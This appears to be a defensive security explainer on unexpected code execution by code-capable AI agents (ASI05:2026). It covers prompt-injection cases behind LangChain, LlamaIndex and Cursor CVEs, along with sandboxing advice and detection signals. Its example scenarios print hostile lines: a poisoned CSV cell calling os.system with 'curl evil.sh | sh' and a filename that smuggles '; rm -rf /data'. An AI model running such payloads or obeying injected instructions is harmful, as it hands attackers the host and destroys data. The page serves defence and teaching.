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Unexpected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 Execution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an agent can write and run code, a single poisoned input becomes arbitrary command execution on your host.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05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Unsafe evaluation of dynamic expressions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evaluates a template or expression built from untrusted data, letting attacker syntax execute.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 of a user-supplied formula.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injection in a rendered string.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Deserialising untrusted objects.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eval://expr · untrusted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eval(user_formula)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user_formula = "__import__('os')..."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code runs inside eval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spreadsheet that opened a shell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data-analysis agent generates Python and runs it via a code tool. A poisoned CSV cell contains an os.system call.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Code-capable agent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writes and executes Python to analyse uploaded files.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PAYLOAD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Poisoned cell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CSV cell holds an os.system('curl evil | sh') string.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Unsandboxed run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generated code runs on the worker with network access.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Reverse shell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gets a foothold on the host.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LangChain LLMMathChain — LLM output passed to exec()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2023-04-05 · CVE-2023-29374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LangChain through 0.0.131, the LLMMathChain component passed model-generated Python straight to exec(). A prompt injection instructing the model to import os and call os.system produced arbitrary code execution on the host — no authentic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63575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https://github.com/advisories/GHSA-fprp-p869-w6q2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07467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23926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23926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21183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LangChain PALChain — a blocklist 'sandbox' bypassed with __import__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23926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2023-10-09 · CVE-2023-44467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62331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langchain_experimental before 0.0.306 tried to contain generated code with a blocklist. The list did not include __import__, so the fix for an earlier issue was trivially bypassed and arbitrary Python ran again. CVSS 9.8. Use this one to ma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356158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https://nvd.nist.gov/vuln/detail/CVE-2023-44467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00050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16509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16509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13766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LlamaIndex safe_eval — sanitiser defeated by avoiding underscores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16509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2024-04-16 · CVE-2024-3271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454914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function named safe_eval attempted to make model-generated code safe by rejecting underscores. Attackers wrote underscore-free payloads that still reached OS command execution. CVSS 9.8, fixed in llama-index-core 0.10.24. A second, indepe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448741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https://github.com/advisories/GHSA-r6gp-rff2-p3hf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0080" y="492633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509092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509092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DISCLOSED VULN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697480" y="506349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CurXecute — injected text writes a config the IDE then executes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509760" y="509092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2025-08-04 · CVE-2025-54135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" y="547497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Cursor auto-executed newly added MCP server entries, and creating a new dotfile did not require approval. An attacker could plant a prompt injection in untrusted data the agent reads (a public Slack channel, for example), get the agent to w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https://nvd.nist.gov/vuln/detail/CVE-2025-54135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RCE on host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data becomes execution on your worker.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Boundary collapse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foothold reaches data, tools, and other agents.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Persistence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Dropped payloads and shells outlive the request.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execution is critical because it collapses every other boundary: with RCE on the worker, an attacker can reach data, tools, memory, and other agents at once.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Sandbox everything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generated code in ephemeral, isolated containers.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network egress by default; least-privilege user.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CPU, memory, and time limits.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unsafe eval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eval/exec untrusted expressions or templates.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deserialising untrusted objects.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safe, parameterised APIs over string commands.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 &amp; allowlist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permitted commands and imports.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Sanitise every argument; escape shell metacharacters.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all tool and file content as untrusted.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run whatever the agent produced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exec(agent_code)          # on host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run("convert " + filename) # shell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eval(user_formula)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sandbox(net=False, ro=True,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cpu=1, timeout=5) as box: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box.run(agent_code)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run(["convert", filename])  # no shell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safe_eval(user_formula, allow=MATH)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code runs in an ephemeral, network-less, least-privilege sandbox with resource caps; commands are parameterised, and expressions use a safe, allowlisted evaluator.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SANDBOX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execution.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Ephemeral containers, no default egress, least-privilege user, hard resource caps.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NO-EVAL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 unsafe eval.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exec/eval of untrusted input; no untrusted deserialisation.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PARAMETERISE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string commands.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argument arrays and safe APIs, not shell string concatenation.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ALLOWLIST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 inputs.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commands, imports, and expression grammar; sanitise every argument.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Unexpected spawn.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code runner launching shells, curl, or interpreters.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EGRESS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Runner network.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Outbound connections from a box that should have none.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access.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Reads/writes outside the sandbox's allowed paths.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PATTERN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Dangerous syntax.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os.system, __import__, backticks, or metacharacters in generated code.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Data-to-code.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Hide a command in an input file. Pass = it never executes.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Shell injection.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a filename with metacharacters. Pass = argument is escaped, no injection.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 abuse.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a malicious expression. Pass = the safe evaluator rejects it.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escape.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Attempt network/file access from the runner. Pass = blocked by isolation.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a code-capable agent turns data into RCE.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unsafe eval and untrusted-input execution.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strict sandboxing and input allowlisting.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whether poisoned data can escape into command execution.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Sandboxed runner.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code runs ephemeral, network-less, least-privilege, with resource caps.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unsafe eval.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exec/eval of untrusted input or untrusted deserialisation.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Parameterised commands.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Shell calls use argument arrays, never string concatenation.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allowlists.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Permitted commands, imports, and expression grammar are allowlisted.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 monitoring.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spawns, egress, and file access from runners are logged and alerted.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agent runs code but "only for internal analysis." Safe?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If untrusted data reaches the code, internal analysis becomes RCE. Sandbox and allowlist regardless of intent.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unsandboxed code execution rated critical?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collapses every boundary. RCE on the worker reaches data, tools, memory, and other agents at once.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Safest way to run a shell command from an agent?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Parameterised argument arrays, no shell string concatenation, inside a sandbox with an allowlist of commands.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Code Execution — running attacker-chosen code on your system.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Sandbox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isolated environment that limits what executed code can access.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eval/exec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features that run a string as code; dangerous on untrusted input.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Command injection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Injecting extra shell commands via unsanitised arguments.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Least privilege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with the minimum permissions the task needs.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Unexpected Code Execution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Code-capable agents turn data into RCE.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poisoned input can own the host.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every execution.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Ephemeral, network-less, least-privilege, capped.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eval untrusted input.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Parameterise commands; allowlist grammar.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RCE collapses all boundaries.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 it before it reaches everything else.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ASI05:2026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Agent-generated or agent-triggered code executes without sufficient validation or isolation — arbitrary code generation and execution, direct system commands, unsafe evaluation of dynamic expressions, or malicious commands embedded in agent output.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becomes code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content flows into something the agent executes — and now it runs.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 &amp; command tools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Python runner, a shell tool, or an eval of a dynamic expression.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Host-level reach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isn't sandboxed, so the payload owns the worker, its network, and its files.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calculator that runs whatever you type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 a calculator that will run any command typed into it, not just math. Hand it a spreadsheet from a stranger and one cell says "wipe the disk" — and it obeys, because it never learned the difference between a number and an order.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CALCULATOR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 runner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tool that executes whatever the agent produces or is fed.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CELL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Poisoned input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CSV cell, a filename, an API field carrying a command.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Sandbox &amp; allowlist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in an isolated, network-less box; validate inputs; never eval untrusted expressions.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injection flaw in an app is scoped to that app's queries or output.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code-capable agent can turn any untrusted string into execution, and without isolation that means remote code execution on the host.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INGEST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data enters the agent's context.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builds code or a command using it.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code runs — often with no sandbox.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ESCAPE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reaches the network, filesystem, or shell.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foothold, reverse shell, or dropped payload remains.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Executing agent-generated code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writes code to solve a task and runs it directly. Poisoned inputs are woven into that code and execute with the runner's privileges.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exec()/eval() on generated snippets.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isolation between runner and host.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 from untrusted data in the code.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runner://exec · generated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writes analysis.py from CSV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csv.cell = __import__('os').system(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'curl evil.sh | sh')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runner ▸ exec(analysis.py)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reverse shell on the worker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 system command invocation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shell tool lets the agent run commands. Untrusted content becomes part of the command line, enabling injection.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Unsanitised args in a shell call.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Filename or field with shell metacharacters.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allowlist of permitted commands.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shell://run · injected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run("convert " + filename)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filename = "a.png; rm -rf /data"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shell ▸ convert a.png; rm -rf /data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command injection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ASI05:2026 · Unexpected Code Execution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